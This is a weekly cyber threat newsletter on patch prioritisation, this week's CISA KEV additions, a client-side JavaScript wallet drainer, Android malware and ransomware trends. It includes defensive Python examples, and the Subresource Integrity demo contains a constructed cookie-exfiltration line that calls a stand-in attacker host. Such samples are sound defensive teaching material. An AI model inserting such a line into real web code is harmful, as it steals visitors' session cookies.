
Cyber Threat Weekly – #83

Derek Krein

The week of June 16th through June 22nd, roughly 361 cyber news articles were reviewed.  A light amount of cyber threat trends and adversarial behavior news to share.  Been thinking about cybersecurity hygiene and security theater.  Are we just going through the motions?

A top priority should be identities, especially weak, reused, or default passwords.  Phishing-resistant multi-factor authentication (MFA) helps; threat actors actively work to bypass weak MFA such as SMS codes and push prompts.  Excessive privileges and access rights open doors.  That’s just getting started on identity hygiene.  There are many more hygiene needs beyond identity.  Are we testing and measuring to ensure improvement, or just checking boxes?

Let’s start with a third-party JavaScript attack leveraging social engineering.  Abuse of open-source tools in Android malware.  A reminder to consistently verify your third-party suppliers.  Social engineering, often the attacker’s weapon of choice. 

Researchers share insights around Qilin ransomware.  Trending attacker techniques March-May 2025 – Report.  A nice little write up on living off the land methodology and tools. 


Broken Record Alert: Don’t get pwned by N-day vulnerabilities!!!

Known exploited software flaws are one of the top 4 initial access vectors and have increased sharply in recent months.  We continue to share n-day vulnerabilities being actively exploited.  Priority #1, start with the CISA / VulnCheck known exploited vulnerability (KEV) catalogs.  If it’s in the catalog, it should be patched.

A close #2 priority is flaws with weaponized proof of concept (PoC) code publicly available; the odds of exploitation rise sharply once that code exists.  If you do nothing else with patching, have an emergency 24-to-48-hour patching process for vulnerabilities that are actively exploited or have weaponized PoC code available.

You should consider what is exposed to the Internet.  Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices and services exposed to the Internet.
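To make the two-tier rule above concrete, here is an added example of my own (not code from CISA or VulnCheck) that triages an asset inventory against a feed in the CISA KEV JSON format plus a list of CVEs with weaponized PoC code.  The KEV records are a constructed sample using this week’s three CVE IDs with illustrative dates; the inventory, the PoC list and its CVE-2099-* placeholder IDs are hypothetical.

```python
"""
Added example (not from the newsletter, CISA or VulnCheck): triage an asset
inventory against a feed in the CISA KEV JSON format plus a list of CVEs with
weaponized public PoC code, applying the two-tier emergency window above.
"""
import json
from datetime import datetime, timedelta

# Constructed sample in the shape of the CISA KEV feed
# (known_exploited_vulnerabilities.json). The CVE IDs are this week's additions;
# dateAdded/dueDate values here are illustrative, not copied from the catalog.
KEV_SAMPLE = json.dumps({
    "catalogVersion": "2025.06.17",
    "vulnerabilities": [
        {"cveID": "CVE-2023-33538", "vendorProject": "TP-Link", "product": "Multiple Routers",
         "dateAdded": "2025-06-16", "dueDate": "2025-07-07", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-43200", "vendorProject": "Apple", "product": "Multiple Products",
         "dateAdded": "2025-06-16", "dueDate": "2025-07-07", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2023-0386", "vendorProject": "Linux", "product": "Kernel",
         "dateAdded": "2025-06-17", "dueDate": "2025-07-08", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Hypothetical: CVEs your exploit-intel source says have weaponized public PoC code.
# CVE-2099-* IDs are placeholders, not real identifiers.
POC_AVAILABLE = {"CVE-2099-0001"}

# Constructed asset inventory: asset -> exposure and open CVEs.
INVENTORY = {
    "edge-vpn-01":     {"internet_exposed": True,  "cves": ["CVE-2099-0001", "CVE-2099-0002"]},
    "build-linux-07":  {"internet_exposed": False, "cves": ["CVE-2023-0386"]},
    "branch-router-3": {"internet_exposed": True,  "cves": ["CVE-2023-33538"]},
}

EMERGENCY_WINDOW = timedelta(hours=48)
REVIEW_TIME = datetime(2025, 6, 23, 9, 0)   # when this triage run is assumed to happen


def load_kev(feed_json):
    """Index the KEV feed by CVE ID for O(1) lookups."""
    return {v["cveID"]: v for v in json.loads(feed_json)["vulnerabilities"]}


def tier_for(cve, kev, poc_available):
    """Tier 1: in KEV (known exploited). Tier 2: weaponized PoC public. Tier 3: the rest."""
    if cve in kev:
        return 1
    if cve in poc_available:
        return 2
    return 3


def prioritize(inventory, kev, poc_available, now):
    """Return one finding per (asset, CVE), sorted by tier then Internet exposure.

    Tiers 1 and 2 get the 24-to-48-hour emergency deadline; tier 3 stays on the
    normal patch cadence. KEV's own dueDate is carried along for reporting.
    """
    findings = []
    for asset, info in inventory.items():
        for cve in info["cves"]:
            tier = tier_for(cve, kev, poc_available)
            deadline = (now + EMERGENCY_WINDOW).isoformat() if tier < 3 else "normal-cadence"
            findings.append({
                "asset": asset, "cve": cve, "tier": tier,
                "internet_exposed": info["internet_exposed"],
                "deadline": deadline,
                "kev_due": kev.get(cve, {}).get("dueDate"),
            })
    # Lower tier first; within a tier, Internet-exposed assets before internal ones.
    findings.sort(key=lambda f: (f["tier"], not f["internet_exposed"], f["asset"]))
    return findings


if __name__ == "__main__":
    for finding in prioritize(INVENTORY, load_kev(KEV_SAMPLE), POC_AVAILABLE, REVIEW_TIME):
        print(finding)
```

Swap KEV_SAMPLE for the live feed and POC_AVAILABLE for your exploit-intel source and the same sort gives you the Internet-exposed KEV hits at the top of the list, which is where the 48-hour clock should start.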


CISA Known Exploited Vulnerabilities – June 16th to June 22nd:

CVE-2023-33538 – TP-Link Multiple Routers Command Injection Vulnerability:
Affected products are TP-Link TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2.  The impacted products may be end-of-life (EoL) and/or end-of-service (EoS), in which case no fix is coming.  Users should discontinue use of the product and replace it.

CVE-2025-43200 – Apple Multiple Products Unspecified Vulnerability:
The affected products Apple iOS, iPadOS, macOS, watchOS, and visionOS are susceptible to an unspecified vulnerability that can be triggered when processing a maliciously crafted photo or video shared via an iCloud Link.

CVE-2023-0386 – Linux Kernel Improper Ownership Management Vulnerability:
A flaw in the Linux kernel’s OverlayFS subsystem fails to correctly check ownership when a user copies a setuid or capability-bearing file from a nosuid mount into another mount, so the copied file keeps its privileged bits under the wrong uid mapping.  A local user can then execute that file to escalate privileges on the system.  Note the 2023 CVE date: this is a roughly two-year-old bug only now being added to KEV, which is exactly the n-day problem described above.


Social Engineering + Client-Side JavaScript Attack

This supply chain attack is convincing and hard to detect.  Threat actors abused an existing third-party JavaScript dependency on CoinMarketCap’s website to inject their own JavaScript into pages served from the legitimate domain, presenting visitors with a fake Web3 wallet-connect popup.  The payload here was a crypto drainer, but the same foothold in a trusted site’s third-party JavaScript could just as easily harvest credentials or session data, so watch for it on sites that are not crypto related.

https://www.bleepingcomputer.com/news/security/coinmarketcap-briefly-hacked-to-drain-crypto-wallets-via-fake-web3-popup/

https://medium.com/@csideai/coinmarketcap-client-side-attack-a-comprehensive-analysis-by-c-side-ce0b58e77dec
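Subresource Integrity (SRI) is the browser-side control aimed most directly at a vendor script being swapped out from under you.  The following is an added example of my own, not code from CoinMarketCap or the linked write-ups, and it says nothing about how that particular injection worked: it pins a third-party script body to its SRI hash and shows a modified body failing the check.  The script bodies and the cdn.vendor.invalid / attacker.invalid hosts are constructed.

```python
"""
Added example (not from the newsletter, CoinMarketCap or the linked write-ups):
pin a third-party script to a Subresource Integrity (SRI) hash and show a
modified body failing the check the browser performs before executing it.
"""
import base64
import hashlib

# Constructed stand-in for a vendor-hosted script reviewed at build time.
VENDOR_SCRIPT = b"window.vendor = { init: function () { console.log('ok'); } };\n"

# Constructed: the same script with an exfiltration stub appended by an attacker.
TAMPERED_SCRIPT = VENDOR_SCRIPT + b"fetch('https://attacker.invalid/?k=' + document.cookie);\n"

# SRI permits only these digests; browsers evaluate only the strongest one present.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(body, algo="sha384"):
    """Return an SRI integrity token: '<algo>-<base64 digest>'."""
    if algo not in STRENGTH:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(body, integrity):
    """Emulate the browser's integrity check for a space-separated token list.

    Tokens with unknown algorithms are ignored; if none remain the resource is
    allowed (no usable metadata). Otherwise only tokens of the strongest
    algorithm count, and the body passes if any one of them matches.
    """
    tokens = [(t.split("-", 1)[0], t) for t in integrity.split()]
    tokens = [(a, t) for a, t in tokens if a in STRENGTH]
    if not tokens:
        return True
    strongest = max(STRENGTH[a] for a, _ in tokens)
    return any(sri_hash(body, a) == t for a, t in tokens if STRENGTH[a] == strongest)


def script_tag(src, body):
    """Emit a <script> tag pinned to the reviewed body. crossorigin is required
    for SRI to apply to a cross-origin script."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_hash(VENDOR_SCRIPT)
    print(script_tag("https://cdn.vendor.invalid/widget.js", VENDOR_SCRIPT))
    print("original body passes:", verify_sri(VENDOR_SCRIPT, pinned))
    print("tampered body passes:", verify_sri(TAMPERED_SCRIPT, pinned))
```

The caveat: SRI only helps for scripts whose bytes are stable.  Tag managers and A/B tooling that change on every load cannot be pinned, and a pinned loader can still pull unpinned code at runtime.  Pair it with a Content-Security-Policy script-src allowlist and monitoring of what your pages actually load in production.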


Newer Version of Godfather Android Malware

Open-source virtualization tools are abused to hijack applications in an overlay attack.  The malware runs copies of the targeted applications inside a sandbox environment it controls on the infected device, intercepting credentials and other sensitive information in real time while the user believes they are using the real app.

https://www.securityweek.com/godfather-android-trojan-creates-sandbox-on-infected-devices/

https://zimperium.com/blog/your-mobile-app-their-playground-the-dark-side-of-the-virtualization


Third Party Risk Requires Constant Vigilance

Another supply chain attack leading to data loss.  Chain IQ was breached, and data belonging to it and 19 of its customers was leaked on the dark web.  The threat actor group Worldleaks added the company to its leak site.  Third-party risk governance is critical; more than a questionnaire is required to minimize risk.

https://www.securityweek.com/chain-iq-ubs-data-stolen-in-ransomware-attack/

https://chainiq.com/news/cyber-attack-chain-iq-group-ag/


Sophisticated Social Engineering Becoming the Norm

Stating the obvious, it’s interesting how far social engineering can go to get the desired result.  This is evident with ransomware actors abusing social engineering for initial access and often admin access.  A nation state took social engineering to another level: slow, steady, and deliberate, in this case coaxing targets into generating and handing over Google app-specific passwords, which sidestep MFA on the account by design.  We can expect more of this activity.

https://cyberscoop.com/russian-hackers-state-department-sophisticated-attacks-researchers-citizen-lab/

https://citizenlab.ca/2025/06/russian-government-linked-social-engineering-targets-app-specific-passwords/

https://cloud.google.com/blog/topics/threat-intelligence/creative-phishing-academics-critics-of-russia?e=48754805


Qilin Ransomware Observations and Lessons Learned

It’s interesting how similar ransomware threat actors are; even with small differences, the behavior is nearly the same.  The use of living off the land methodology, legitimate tools, social engineering, etc.  Defense preparation and TTPs are shared.

https://blog.qualys.com/vulnerabilities-threat-research/2025/06/18/qilin-ransomware-explained-threats-risks-defenses


ReliaQuest – Top Attacker Techniques March-May 2025

Standouts include ClickFix and social engineering fueling initial access.  MSHTA abuse accounted for 33% of defense evasion observations.  RDP was a top choice for lateral movement.  Qilin ransomware topped leak site numbers.  Possible defensive strategies are included as well.

https://reliaquest.com/blog/whats-trending-top-cyber-attacker-techniques-march-2025-may-2025/


Attackers Paradise, Legit Tools and Admin Utilities

A write-up on how attackers are using living off the land binaries and legitimate tools to fly under the radar.  Some observations from incident response cases and some tools that are very commonly abused.  A quick thought on how to detect what often looks normal.

https://blog.talosintelligence.com/when-legitimate-tools-go-rogue/

